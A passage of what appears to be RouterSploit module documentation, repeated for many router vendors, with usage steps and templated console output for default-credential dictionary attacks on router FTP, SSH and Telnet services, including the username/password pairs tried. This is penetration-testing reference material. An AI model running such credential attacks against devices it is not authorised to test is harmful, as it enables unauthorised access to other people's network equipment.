`./rsf.py` 2. Do: `use creds/routers/dlink/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/dlink/ssh_default_creds rsf (D-Link Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/dlink/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/dlink/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/dlink/telnet_default_creds rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/fortinet/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Fortinet Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/fortinet/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/fortinet/ftp_default_creds rsf (Fortinet Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Fortinet Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/fortinet/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Fortinet Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/fortinet/ssh_default_creds` 3. Do: `set target [TargetIP]` 4.
Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/fortinet/ssh_default_creds rsf (Fortinet Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Fortinet Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/fortinet/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Fortinet Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/fortinet/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/fortinet/telnet_default_creds rsf (Fortinet Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Fortinet Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/huawei/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Huawei Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/huawei/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/huawei/ftp_default_creds rsf (Huawei Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Huawei Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/huawei/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Huawei Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/huawei/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/huawei/ssh_default_creds rsf (Huawei Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Huawei Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/huawei/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Huawei Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/huawei/telnet_default_creds` 3. 
Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/huawei/telnet_default_creds rsf (Huawei Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Huawei Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/ipfire/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IPFire Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ipfire/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ipfire/ftp_default_creds rsf (IPFire Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IPFire Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... 
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/ipfire/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IPFire Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ipfire/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ipfire/ssh_default_creds rsf (IPFire Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IPFire Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/ipfire/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IPFire Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ipfire/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ipfire/telnet_default_creds rsf (IPFire Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IPFire Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/juniper/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Juniper Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/routers/juniper/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/juniper/ftp_default_creds rsf (Juniper Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Juniper Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/juniper/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Juniper Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/juniper/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/juniper/ssh_default_creds rsf (Juniper Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Juniper Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/juniper/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Juniper Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/juniper/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/juniper/telnet_default_creds rsf (Juniper Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Juniper Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/linksys/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Linksys Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/linksys/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/linksys/ftp_default_creds rsf (Linksys Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/linksys/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Linksys Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/linksys/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. 
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/linksys/ssh_default_creds rsf (Linksys Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/linksys/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Linksys Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/linksys/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/linksys/telnet_default_creds rsf (Linksys Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/mikrotik/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mikrotik Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/mikrotik/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/mikrotik/ftp_default_creds rsf (Mikrotik Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/mikrotik/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mikrotik Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/mikrotik/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/mikrotik/ssh_default_creds rsf (Mikrotik Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/mikrotik/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mikrotik Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/routers/mikrotik/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/mikrotik/telnet_default_creds rsf (Mikrotik Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/movistar/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Movistar Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/movistar/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/movistar/ftp_default_creds rsf (Movistar Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Movistar Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... 
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/movistar/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Movistar Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/movistar/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/movistar/ssh_default_creds rsf (Movistar Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Movistar Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/movistar/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Movistar Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/movistar/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/movistar/telnet_default_creds rsf (Movistar Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Movistar Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/netcore/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netcore Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/routers/netcore/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netcore/ftp_default_creds rsf (Netcore Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netcore Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/netcore/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netcore Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netcore/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netcore/ssh_default_creds rsf (Netcore Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netcore Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/netcore/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netcore Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netcore/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netcore/telnet_default_creds rsf (Netcore Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netcore Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
